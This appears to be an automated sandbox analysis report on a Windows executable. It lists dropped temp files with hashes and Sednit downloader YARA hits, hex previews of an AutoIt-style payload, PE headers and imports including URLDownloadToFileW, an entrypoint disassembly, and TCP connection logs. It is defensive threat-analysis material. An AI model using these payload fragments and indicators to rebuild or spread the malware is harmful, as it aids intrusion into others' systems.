                                                                  Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                  C:\Windows\Temp\autF3C8.tmp

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):25822
                                                                  Entropy (8bit):7.676686877584948
                                                                  Encrypted:false
                                                                  SSDEEP:768:X4ltkgfpZ92EBn80hR2u5k+G2qqTswsOWDK4dQS97hJw:X4bx9780/k+1TLs3FGOi
                                                                  MD5:436C1BB98DEECCECB73FAD945F1DD3DC
                                                                  SHA1:774313BA911945589971BBC73498D81F060DABE6
                                                                  SHA-256:05EAE1691149CC66E458D5E5B4430BD3B938B278B8BDB2C887A13C9871004C51
                                                                  SHA-512:66EA41B9B4A42F7C40D1CE5B6E82A6F03E8489648B912D96A81EFA13D340D4D651078DF7C1302C595CA83408E7208D1D79F02165DC27383952A9ABE7F851C3E2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:..%...F:.Q&.Y..o4.M&.Y..mC.Lf.)..k6..f.9..T.M.Y..kF....(.I5.M..I..i7.....1....Y..k7.."@...o2.L.......L&....i6.L.....m9..(..@....N......8..2.Y..o4.*fs...g5.4......h.MfSp.`.[.* ..1..&.....2.M.Sy...2.P.......M...X.M&`...Q5... ....7...T@..e3.L.39....L.s..mM@M..fiE.Lf.I...K....mF.Q.A...a5.M....E.4.r...n......@.6@K../.k8..s@./......"....E...f.i..k8..&.0..a2.L.....s2...T`..j.y...m7.L&.9.......Y.(..4...z......... ....L.......T.A.i..o4.f.... .H....`'....DH.......@.....H...2..&.`!Bo3...p.\..@#.,Fr.T..l...R.y....{......Z...@............G.(...hL.S ...6.:..B..........1..@.>@1..0.N.@L.#.....@.....7....>I..iB..(.....@..$..#.....F.M.\...i6.......I..x.9.....M@.0...9@....@....".(..`.....fi4.t..0...& ...j.4L.....L. .Y..g3Y...f .H...1.4....@....jf..P@..5..h.#@%.4.....h........&.....c5...}.z... ...d.(.M..>0.O.kB.Q.T...e2...tY......H*.....V..0.c.T....@......... :..P.....;..P...Vd...x[.L.........CjkC...|SP*..!.bA...L..|...#.2.0@#..'...<..b....D .........h.}..K......mB..r8.-...| m.....i.&@w...@_

                                                                  C:\Windows\Temp\ivlgocv

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):83514
                                                                  Entropy (8bit):3.495672104133364
                                                                  Encrypted:false
                                                                  SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                  MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                  SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                  SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                  SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                  Malicious:false
                                                                  Yara Hits:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\ivlgocv, Author: Florian Roth
                                                                  Reputation:unknown
                                                                  Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                  C:\Windows\Temp\nnuljvc

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):83514
                                                                  Entropy (8bit):3.495672104133364
                                                                  Encrypted:false
                                                                  SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                  MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                  SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                  SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                  SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                  Malicious:false
                                                                  Yara Hits:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\nnuljvc, Author: Florian Roth
                                                                  Reputation:unknown
                                                                  Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                  C:\Windows\Temp\tgttoag

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):83514
                                                                  Entropy (8bit):3.495672104133364
                                                                  Encrypted:false
                                                                  SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                  MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                  SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                  SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                  SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                  Malicious:false
                                                                  Yara Hits:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\tgttoag, Author: Florian Roth
                                                                  Reputation:unknown
                                                                  Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                  C:\Windows\Temp\wcavojr

                                                                  Download File
                                                                  Process:C:\ProgramData\UpSys.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):83514
                                                                  Entropy (8bit):3.495672104133364
                                                                  Encrypted:false
                                                                  SSDEEP:1536:QxUzapK6b5Hg7OoSZ9f7fOxrIGyiBquTsR3cgwO0wNP02:wo8GQ
                                                                  MD5:940B1915CADEE0E2B33D80799816F6C7
                                                                  SHA1:2C10E4FEC3E8C054055D1ED78757117575F273F2
                                                                  SHA-256:81E89E7266CFE5158E44F5578C8BE61353E781DAEBDD47A33597E9EC503D379C
                                                                  SHA-512:CC3C574FD5392C1B54146B591E22B1C01C95E34A602C403AD96C49B7EE6AD31D1478A00CC1334286ADDC5CB94496372A172745E9AD20554023E1E22C7DA1E1C5
                                                                  Malicious:false
                                                                  Yara Hits:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: C:\Windows\Temp\wcavojr, Author: Florian Roth
                                                                  Reputation:unknown
                                                                  Preview:4D7573744465636C61726556617273!7ET4755495F52554E4445464D5347!7ET47554944617461536570617261746F7243686172!7ET20404C4620!7ET57696E44657465637448696464656E54657874!7ET312E35!7ET506F77657252756E!7ET202D20417574686F7220627920426C75654C696665!7ET5B434C4153533A506F77657252756E3A76!7ET5D!7ET323031362D32303231!7ET2040557365724E616D6520!7ET2040436F6D70696C656420!7ET20404175746F497445786520!7ET20404F534172636820!7ET20404175746F497458363420!7ET20404F5356657273696F6E20!7ET20404F5356657273696F6E20!7ET5F2858507C32303028307C332929!7ET4F7065726174696E672053797374656D204E6F7420537570706F7274656421!7ET546F20737461727420736F66747761726520796F75206D75737420686176652041646D696E6973747261746F722072696768747321!7ET204053637269707444697220!7ET204057696E646F777344697220!7ET53797374656D33325C!7ET2040576F726B696E6744697220!7ET6B65726E656C33322E646C6C!7ET7573657233322E646C6C!7ET61647661706933322E646C6C!7ET7368656C6C33322E646C6C!7ET6F6C6533322E646C6C!7ET73686C776170692E646C6C!7ET67646933322E646C6C!7ET484B4C4D!7ET48

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Entropy (8bit):7.781346485304652
                                                                  TrID:
                                                                  • Win64 Executable Console (202006/5) 92.65%
                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:bQQHP9ciRL.exe
                                                                  File size:3574272
                                                                  MD5:f56e50f8ee4dfb577cbb3f53f42ed20c
                                                                  SHA1:f5beda1a8599b043483bc21db2f1ea80795246c7
                                                                  SHA256:786cfe1759666fb139dcee757637e7c0d92586caaf6020eb60b455d7bd2251e8
                                                                  SHA512:6eca83f4361df6527347518e30475b8edeb171d6b4f79862ea7c0937823cfd2a67a1e5c1f86eda6b65fafcbb88199911c9cbcd4c60a7406c1c2786cefcc67496
                                                                  SSDEEP:98304:L2CgTecDhJLSeX4VDgtLEycahCF/sFQTxEgzuNwKT4mxM/:oqcDvX4KoxZsFQTxdywtmxM
                                                                  TLSH:35F5016A61403798C45BC1BC4533ED8AB3F6161E0FE9A5DE71EBB6C077EA850DA42F01
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......b..........#......~...x........ ........@..............................T........... ................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x1402081e0
                                                                  Entrypoint Section:.gPNi
                                                                  Digitally signed:false
                                                                  Imagebase:0x140000000
                                                                  Subsystem:windows cui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:HIGH_ENTROPY_VA, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x62C9D9F2 [Sat Jul 9 19:41:38 2022 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:cb2fea05369697a6eaeb692aa62f1b70

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push 0F50C188h
                                                                  call 00007F57B4D37D34h
                                                                  sbb byte ptr [ebx+29h], cl
                                                                  mov cl, 25h
                                                                  inc eax
                                                                  scasd
                                                                  xlatb
                                                                  movsb
                                                                  jl 00007F57B4A8F0E6h
                                                                  xlatb
                                                                  inc esp
                                                                  sbb eax, DB23D698h
                                                                  push ecx
                                                                  sub eax, 7FBB2590h
                                                                  int1
                                                                  mov al, D1h
                                                                  and al, 1Fh
                                                                  pop es
                                                                  cld
                                                                  rol dword ptr [edx+edx*8+1B2B6E8Fh], 1
                                                                  retf
                                                                  mov dword ptr [eax+2Bh], ecx
                                                                  sbb ebp, dword ptr [esi]
                                                                  out dx, al
                                                                  sub eax, F5D5E9FBh
                                                                  rol byte ptr [edi+edi*4-42h], 1
                                                                  mov al, D3h
                                                                  pop edx
                                                                  or eax, 5B23EB68h
                                                                  out 1Ch, eax
                                                                  cmpsd
                                                                  and edi, dword ptr [ebx-286DC743h]
                                                                  and al, E9h
                                                                  mov ch, D4h
                                                                  rol dword ptr [edi+edi+51h], 1
                                                                  hlt
                                                                  and eax, B8DF27DBh
                                                                  and eax, 2AD78A7Bh

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2100600xc8.gPNi
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5480000x1d5.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x543a300x3e4c.gPNi
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5438f00x138.gPNi
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1df0000xc0.:&C@J
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x47d1e0x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x490000x1fafc0x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x690000x2eb40x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .pdata0x6c0000x3a440x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  _RDATA0x700000xf40x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .[UG9j0x710000x16db300x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .:&C@J0x1df0000x8080xa00False0.037109375data0.20130848237838797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .gPNi 0x1e00000x36787c0x367a00unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x5480000x1d50x200False0.5234375data4.7083919432940915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_MANIFEST0x5480580x17dXML 1.0 document textEnglishUnited States

                                                                  Imports

                                                                  DLLImport
                                                                  KERNEL32.dllCreateDirectoryW
                                                                  USER32.dllShowWindow
                                                                  SHELL32.dllSHGetSpecialFolderPathW
                                                                  ole32.dllCoInitializeEx
                                                                  OLEAUT32.dllVariantClear
                                                                  WININET.dllInternetOpenA
                                                                  urlmon.dllURLDownloadToFileW
                                                                  dxgi.dllCreateDXGIFactory
                                                                  KERNEL32.dllLocalAlloc, LocalFree, GetModuleFileNameW, ExitProcess, LoadLibraryA, GetModuleHandleA, GetProcAddress

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 15, 2022 03:58:13.314966917 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:13.315017939 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:13.315131903 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:13.383511066 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:13.383533955 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:13.676712990 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:13.676839113 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.168813944 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.168850899 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:14.169277906 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:14.169342041 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.173434973 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.220494986 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:14.313232899 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:14.313337088 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.313359022 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:14.313410997 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.313417912 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:14.313436031 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:14.313465118 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.313499928 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.317308903 CEST49752443192.168.2.63.220.57.224
                                                                  Jul 15, 2022 03:58:14.317332029 CEST443497523.220.57.224192.168.2.6
                                                                  Jul 15, 2022 03:58:15.059449911 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.059480906 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.059564114 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.060503006 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.060513973 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.135644913 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.135749102 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.156301975 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.156326056 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.156702042 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.156761885 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.157497883 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.204485893 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.210427999 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.210510969 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.210510969 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.210576057 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.215344906 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.215358973 CEST44349754149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:15.215378046 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.215415001 CEST49754443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:15.520086050 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.520119905 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.520205021 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.520906925 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.520917892 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.575308084 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.575582981 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.592880964 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.592904091 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.593262911 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.593699932 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.602391005 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.644526958 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798357010 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798434019 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798451900 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798501968 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798504114 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798513889 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798548937 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798584938 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798616886 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798625946 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798661947 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798674107 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798706055 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798713923 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798751116 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798754930 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798794985 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798795938 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798808098 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798835993 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798875093 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798891068 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798901081 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.798927069 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798953056 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.798959970 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799006939 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799010038 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799017906 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799052954 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799084902 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799094915 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799103975 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799139977 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799160004 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799185038 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799191952 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799202919 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799231052 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799285889 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799392939 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799453974 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799482107 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799531937 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799552917 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799601078 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799608946 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799652100 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799659014 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799705029 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799712896 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799762011 CEST49755443192.168.2.6162.159.129.233
                                                                  Jul 15, 2022 03:58:15.799770117 CEST44349755162.159.129.233192.168.2.6
                                                                  Jul 15, 2022 03:58:15.799817085 CEST49755443192.168.2.6162.159.129.233
